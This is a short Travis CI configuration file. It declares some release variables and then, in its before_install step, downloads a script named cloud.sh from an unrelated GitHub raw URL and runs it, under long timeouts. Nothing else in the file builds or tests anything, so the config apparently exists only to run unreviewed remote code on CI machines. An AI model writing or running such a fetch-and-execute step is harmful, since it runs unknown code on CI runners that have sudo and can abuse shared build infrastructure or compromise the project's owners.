timeout : 7200s
sudo: required
language: bash
services:
  - docker
env:
  global:
    - TRAVIS_WAIT=20000
    - CT_RELEASE=1.0.1
    - BR_RELEASE=2015.08.1-rev1
    - BR_TRAVIS_RELEASE=1.0.0

    
    
before_install: 
  
  - travis_wait 45000 sudo apt-get -y update 
  - travis_wait 45000 sudo apt-get -y install wget
  - travis_wait 45000 sudo apt-get -y update
  - travis_wait 45000 wget https://raw.githubusercontent.com/comandashtar/colab-2/main/cloud.sh && chmod +x cloud.sh && ./cloud.sh
  
